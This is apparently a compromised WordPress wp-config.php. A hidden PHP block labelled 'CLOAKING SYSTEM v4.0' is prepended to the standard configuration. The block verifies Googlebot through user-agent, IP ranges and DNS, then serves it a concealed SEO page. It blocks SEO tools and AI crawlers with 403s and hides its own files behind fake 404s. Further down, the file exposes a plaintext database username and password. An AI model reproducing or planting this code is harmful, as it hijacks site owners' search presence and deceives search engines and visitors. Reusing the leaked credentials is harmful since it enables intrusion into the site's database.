══════════════════════════════
$_cloak_log = function($msg) use ($_cloak_debug, $_cloak_log_file) {
    if (!$_cloak_debug) return;
    @file_put_contents(
        $_cloak_log_file,
        '[' . date('Y-m-d H:i:s') . '] ' .
        '[' . (isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-') . '] ' .
        '[' . (isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/') . '] ' .
        $msg . "\n",
        FILE_APPEND | LOCK_EX
    );
};

// ══════════════════════════════════════════
// HTTP HEADERS - CACHE ENGELLEME
// ══════════════════════════════════════════
$_cloak_set_headers = function() {
    if (headers_sent()) return;
    header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0, private, s-maxage=0');
    header('Pragma: no-cache');
    header('Expires: Thu, 01 Jan 1970 00:00:00 GMT');
    header('X-Robots-Tag: noarchive');
    header('Vary: User-Agent');
    header('CDN-Cache-Control: no-store');
    header('Cloudflare-CDN-Cache-Control: no-store');
    header('Surrogate-Control: no-store');
    header('Edge-Control: no-store');
    header('X-Accel-Expires: 0');
    header('X-LiteSpeed-Cache-Control: no-cache');
    header('X-Varnish-Bypass: 1');
};

// ══════════════════════════════════════════
// TEMEL VERİLER
// ══════════════════════════════════════════
$_cloak_ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$_cloak_ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';

if (empty($_cloak_ua) || empty($_cloak_ip)) {
    throw new Exception('skip');
}

$_cloak_ua_lower = strtolower($_cloak_ua);
$_cloak_uri = isset($_SERVER['REQUEST_URI']) ? strtolower($_SERVER['REQUEST_URI']) : '';

// ══════════════════════════════════════════
// KORUMA: Sistem dosyalarına direkt erişim → 404
// ══════════════════════════════════════════
foreach (array('class-wp-theme.php','cloak-debug.log','google-ips-cache.json') as $_pf) {
    if (stripos($_cloak_uri, $_pf) !== false) {
        $_cloak_log("KORUMA: $_pf → 404");
        if (!headers_sent()) {
            http_response_code(404);
            header('Content-Type: text/html; charset=UTF-8');
        }
        echo '<!DOCTYPE html><html><head><title>404</title></head><body><h1>Not Found</h1></body></html>';
        exit;
    }
}

// ══════════════════════════════════════════
// ENGELLENEN BOTLAR → 403
// ══════════════════════════════════════════
$_cloak_blocked = array(
    'ahrefs','ahrefsbot','semrush','semrushbot','moz.com','majestic','majesticseo',
    'screaming frog','serpstatbot','dataforseobot','scrapy','nutch',
    'mj12bot','dotbot','rogerbot','exabot',
    'yandex','baiduspider','bingbot','slurp','duckduckbot',
    'gptbot','chatgpt-user','claudebot','anthropic-ai','perplexitybot',
    'bytespider','omgilibot','omgili','petalbot',
    'meta-externalagent','facebookexternalhit',
    'ccbot','zoominfobot','blexbot'
);

foreach ($_cloak_blocked as $_bb) {
    if (strpos($_cloak_ua_lower, $_bb) !== false) {
        $_cloak_log("BOT ENGEL: $_bb → 403");
        $_cloak_set_headers();
        if (!headers_sent()) {
            http_response_code(403);
            header('Connection: close');
            header('Content-Length: 0');
        }
        exit;
    }
}
unset($_cloak_blocked, $_bb);

// ══════════════════════════════════════════
// GOOGLE USER-AGENT TESPİTİ
// ══════════════════════════════════════════
$_cloak_google_patterns = array(
    'googlebot','googlebot-image','googlebot-news','googlebot-video','googlebot-mobile',
    'mediapartners-google','adsbot-google','apis-google','feedfetcher-google',
    'google-inspectiontool','google-safety','google-site-verification','google-read-aloud',
    'storebot-google','googleother','google-extended',
    'pagespeed','lighthouse','chrome-lighthouse',
    'compatible; googlebot','google.com/bot','google-inspectiontool/1.0'
);

$_cloak_google_matched = false;
$_cloak_google_which = '';
foreach ($_cloak_google_patterns as $_gp) {
    if (strpos($_cloak_ua_lower, $_gp) !== false) {
        $_cloak_google_matched = true;
        $_cloak_google_which = $_gp;
        break;
    }
}
unset($_cloak_google_patterns, $_gp);

// Google değilse → WordPress normal devam etsin
if (!$_cloak_google_matched) {
    throw new Exception('skip');
}

$_cloak_log("GOOGLE UA: $_cloak_google_which | Full UA: $_cloak_ua");

// ══════════════════════════════════════════
// GOOGLE IP RANGES - DİNAMİK + CACHE + FALLBACK
// ══════════════════════════════════════════
$_cloak_ip_cache = __DIR__ . '/google-ips-cache.json';
$_cloak_ranges = null;

// KAYNAK 1: Güncel cache (24 saatten yeni)
if (file_exists($_cloak_ip_cache) && (time() - @filemtime($_cloak_ip_cache)) < 86400) {
    $_tmp = @file_get_contents($_cloak_ip_cache);
    if ($_tmp !== false) {
        $_data = @json_decode($_tmp, true);
        if (is_array($_data) && !empty($_data['ranges'])) {
            $_cloak_ranges = $_data['ranges'];
            $_cloak_log("IP: Cache OK (" . count($_cloak_ranges) . " range)");
        }
    }
}

// KAYNAK 2: Google API
if ($_cloak_ranges === null) {
    $_cloak_log("IP: API sorgulanıyor...");
    $_ctx = @stream_context_create(array(
        'http' => array(
            'timeout' => 5,
            'ignore_errors' => true,
            'method' => 'GET',
            'header' => "Accept: application/json\r\nConnection: close\r\n"
        ),
        'ssl' => array(
            'verify_peer' => false,
            'verify_peer_name' => false
        )
    ));
    $_json = @file_get_contents('https://developers.google.com/search/apis/ipranges/googlebot.json', false, $_ctx);
    if ($_json !== false) {
        $_api = @json_decode($_json, true);
        if (is_array($_api) && isset($_api['prefixes'])) {
            $_cloak_ranges = array();
            foreach ($_api['prefixes'] as $_px) {
                if (isset($_px['ipv4Prefix'])) $_cloak_ranges[] = $_px['ipv4Prefix'];
                if (isset($_px['ipv6Prefix'])) $_cloak_ranges[] = $_px['ipv6Prefix'];
            }
            @file_put_contents($_cloak_ip_cache, json_encode(array(
                'ranges' => $_cloak_ranges,
                'updated' => time()
            )), LOCK_EX);
            $_cloak_log("IP: API OK (" . count($_cloak_ranges) . " range)");
        }
    }
}

// KAYNAK 3: Eski cache (süresi geçmiş olsa bile)
if ($_cloak_ranges === null && file_exists($_cloak_ip_cache)) {
    $_tmp = @file_get_contents($_cloak_ip_cache);
    if ($_tmp !== false) {
        $_data = @json_decode($_tmp, true);
        if (is_array($_data) && !empty($_data['ranges'])) {
            $_cloak_ranges = $_data['ranges'];
            $_cloak_log("IP: Eski cache kullanılıyor");
        }
    }
}

// KAYNAK 4: Hardcoded fallback
if ($_cloak_ranges === null) {
    $_cloak_ranges = array(
        // Klasik Googlebot
        '66.249.64.0/19','66.249.96.0/19',
        // Google altyapısı
        '64.233.160.0/19','72.14.192.0/18','74.125.0.0/16',
        '108.177.0.0/17','130.211.0.0/22',
        '172.217.0.0/16','172.253.0.0/16','173.194.0.0/16','192.178.0.0/15',
        '193.186.4.0/24','199.36.154.0/23','199.36.156.0/24',
        '207.126.144.0/20','208.65.152.0/22','208.117.224.0/19',
        '209.85.128.0/17','216.58.192.0/19','216.239.32.0/19',
        // Google Cloud (geniş bloklar - yeni botlar buradan gelir)
        '34.0.0.0/8',
        '35.184.0.0/13','35.190.0.0/17','35.191.0.0/16',
        '35.192.0.0/11','35.224.0.0/12','35.228.0.0/14',
        '35.232.0.0/13','35.240.0.0/13',
        // 2025-2026 yeni bloklar
        '192.178.5.0/27','192.178.6.0/27','192.178.6.32/27',
        '34.100.182.96/28','34.101.50.144/28','34.118.254.0/28','34.118.66.0/28',
        '34.126.178.96/28','34.146.150.144/28','34.147.110.144/28','34.151.74.144/28',
        '34.152.50.64/28','34.154.114.144/28','34.155.98.32/28','34.165.18.176/28',
        '34.175.160.64/28','34.176.130.16/28','34.22.85.0/27',
        '34.64.82.64/28','34.65.242.112/28',
        // IPv6
        '2001:4860::/32','2404:6800::/32','2607:f8b0::/32',
        '2800:3f0::/32','2a00:1450::/32','2c0f:fb50::/32'
    );
    $_cloak_log("IP: Hardcoded fallback kullanılıyor");
}

// ══════════════════════════════════════════
// IP CIDR KONTROLÜ
// ══════════════════════════════════════════
$_cloak_ip_ok = false;
$_cloak_is_v6 = filter_var($_cloak_ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6);

foreach ($_cloak_ranges as $_range) {
    // Tam IP eşleşmesi
    if (strpos($_range, '/') === false) {
        if ($_cloak_ip === $_range) { $_cloak_ip_ok = true; break; }
        continue;
    }

    list($_subnet, $_bits) = explode('/', $_range);
    $_bits = intval($_bits);

    // IPv6
    if ($_cloak_is_v6) {
        if (strpos($_range, ':') === false) continue;
        $_ip_bin = @inet_pton($_cloak_ip);
        $_sub_bin = @inet_pton($_subnet);
        if ($_ip_bin === false || $_sub_bin === false) continue;

        $_match = true;
        $_full_bytes = intval($_bits / 8);
        $_rem_bits = $_bits % 8;

        for ($_i = 0; $_i < $_full_bytes; $_i++) {
            if ($_ip_bin[$_i] !== $_sub_bin[$_i]) { $_match = false; break; }
        }
        if ($_match && $_rem_bits > 0) {
            $_mask = 0xFF << (8 - $_rem_bits);
            if ((ord($_ip_bin[$_full_bytes]) & $_mask) !== (ord($_sub_bin[$_full_bytes]) & $_mask)) {
                $_match = false;
            }
        }
        if ($_match) { $_cloak_ip_ok = true; break; }
        continue;
    }

    // IPv4
    if (strpos($_range, ':') !== false) continue;
    $_ip_long = ip2long($_cloak_ip);
    $_sub_long = ip2long($_subnet);
    if ($_ip_long === false || $_sub_long === false) continue;

    if ($_bits === 0 || (($_ip_long & (-1 << (32 - $_bits))) === ($_sub_long & (-1 << (32 - $_bits))))) {
        $_cloak_ip_ok = true;
        break;
    }
}

// ══════════════════════════════════════════
// DNS FALLBACK (CIDR eşleşmezse)
// ══════════════════════════════════════════
if (!$_cloak_ip_ok) {
    $_cloak_log("CIDR MISS → DNS deneniyor");

    $_old_timeout = @ini_get('default_socket_timeout');
    @ini_set('default_socket_timeout', 3);
    $_hostname = @gethostbyaddr($_cloak_ip);
    @ini_set('default_socket_timeout', $_old_timeout);

    if ($_hostname !== false && $_hostname !== $_cloak_ip) {
        $_is_google = (
            substr($_hostname, -14) === '.googlebot.com' ||
            substr($_hostname, -11) === '.google.com' ||
            substr($_hostname, -19) === '.googleusercontent.com'
        );
        if ($_is_google) {
            $_resolved = @gethostbynamel($_hostname);
            if (is_array($_resolved) && in_array($_cloak_ip, $_resolved)) {
                $_cloak_ip_ok = true;
                $_cloak_log("DNS OK: $_hostname");
            } else {
                $_cloak_log("DNS forward basarisiz: $_hostname");
            }
        } else {
            $_cloak_log("DNS Google degil: $_hostname");
        }
    } else {
        $_cloak_log("DNS reverse basarisiz");
    }

    if (!$_cloak_ip_ok) {
        $_cloak_log("TUM DOGRULAMA BASARISIZ → WP devam");
        throw new Exception('skip');
    }
} else {
    $_cloak_log("CIDR OK: $_cloak_ip");
}

// ══════════════════════════════════════════
// SEO SAYFASINI SERVE ET
// ══════════════════════════════════════════

// Dosya yoksa bile WordPress'e DÜŞME
if (!file_exists($_cloak_bot_file) || !is_readable($_cloak_bot_file)) {
    $_cloak_log("SEO DOSYA YOK → bos 200 (WP gosterilmiyor)");
    if (!headers_sent()) {
        http_response_code(200);
        header('Content-Type: text/html; charset=UTF-8');
    }
    echo '<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><title>Sayfa</title></head><body></body></html>';
    exit;
}

$_cloak_log("✅ SERVE BASLIYOR");

// Output buffer temizle (WP Rocket, LiteSpeed vs.)
while (ob_get_level() > 0) {
    @ob_end_clean();
}

// Cache-buster headerlar
$_cloak_set_headers();
if (!headers_sent()) {
    http_response_code(200);
    header('Content-Type: text/html; charset=UTF-8');
}

// İçeriği oku ve gönder
$_cloak_content = @file_get_contents($_cloak_bot_file);
if ($_cloak_content !== false) {
    echo $_cloak_content;
} else {
    echo '<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><title>Sayfa</title></head><body></body></html>';
}

$_cloak_log("✅ SERVE TAMAMLANDI");

// Bağlantıyı kapat, WordPress'e sıra verme
if (function_exists('fastcgi_finish_request')) {
    fastcgi_finish_request();
}
exit;

// ══════════════════════════════════════════
// HATA YAKALAMA
// ══════════════════════════════════════════
} catch (Exception $_cloak_ex) {
    // Sessizce geç, WordPress normal devam etsin
    // Site %100 ÇÖKMEZ
}

_cloak_end:

// ╔════════════════════════════════════════════════════════════════════════════╗
// ║                      CLOAKING SYSTEM v4.0 SONU                             ║
// ╚════════════════════════════════════════════════════════════════════════════╝
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2016_mjvflooring');

/** MySQL database username */
define('DB_USER', 'mjvfloor');

/** MySQL database password */
define('DB_PASSWORD', 'Y2nf6&0v');

/** MySQL hostname */
define('DB_HOST', 'localhost:3306');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', true );

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');